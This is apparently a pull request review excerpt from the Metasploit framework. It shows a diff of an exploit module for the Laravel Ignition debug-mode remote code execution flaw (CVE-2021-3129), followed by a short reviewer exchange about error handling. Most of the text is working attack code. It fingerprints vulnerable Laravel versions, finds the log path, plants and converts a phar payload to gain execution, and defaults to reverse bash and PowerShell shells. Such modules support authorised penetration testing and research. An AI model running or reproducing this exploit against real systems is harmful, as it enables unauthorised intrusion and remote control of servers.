modules/exploits/multi/php/ignition_laravel_debug_rce.rb

```diff
@@ -0,0 +1,219 @@
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-3129'],
+          ['URL', 'https://www.ambionics.io/blog/laravel-debug-rce']
+        ],
+        'DisclosureDate' => '2021-01-13',
+        'Platform' => %w[unix linux macos win],
+        'Targets' => [
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+          [
+            'Windows (In-Memory)',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Ignition execute solution path', '/_ignition/execute-solution']),
+      OptString.new('LOGPATH', [false, 'Laravel log path'])
+    ])
+  end
+
+  def check
+    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path.to_s),
+      'method' => 'PUT'
+    }, 1)
+    # Check whether it is using facade/ignition
+    # If is using it should respond method not allowed
+    # checking if debug mode is enable
+    if res && res.code == 405 && res.body.match(/label:"(Debug)"/)
+      vprint_status 'Debug mode is enabled.'
+      # check version
+      versions = JSON.parse(
+        res.body.match(/.+"report":(\{.*),"exception_class/).captures.first.gsub(/$/, '}')
+      )
+      version = Rex::Version.new(versions['framework_version'])
+      vprint_status "Found PHP #{versions['language_version']} running Laravel #{version}"
+      return Exploit::CheckCode::Vulnerable if version <= Rex::Version.new('8.26.1')
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    @logfile = datastore['LOGPATH'] || find_log_path
+    fail_with(Failure::BadConfig, 'Unable to find log path. Set it up manually') unless @logfile
+
+    clear_log
+    put_payload
+    convert_to_phar
+    run_phar
+
+    handler
+
+    clear_log
+  end
+
+  def find_log_path
+    res = post Rex::Text.rand_text_alpha_upper(12)
+    if res.code == 500 && res.body.match(%r{"file":"(\\/[^"]+?)/vendor\\/[^"]+?})
+      logfile = Regexp.last_match(1).gsub(/\\/, '')
+      logfile += '/storage/logs/laravel.log'
+      res = post logfile
+      if res.code == 200
+        vprint_status "Found log file #{logfile}"
+        return logfile
+      end
+    else
+      vprint_error 'Unable to find full path'
```

Comment:
Should we change this fo `fail_with` instead, and more explicitly notify the user of what went wrong?

Reply:
For me seems fine now [df53a62](https://github.com/rapid7/metasploit-framework/pull/16159/commits/df53a62cc9964bb313168802102e73ddcd936cc9). Let me know what you think.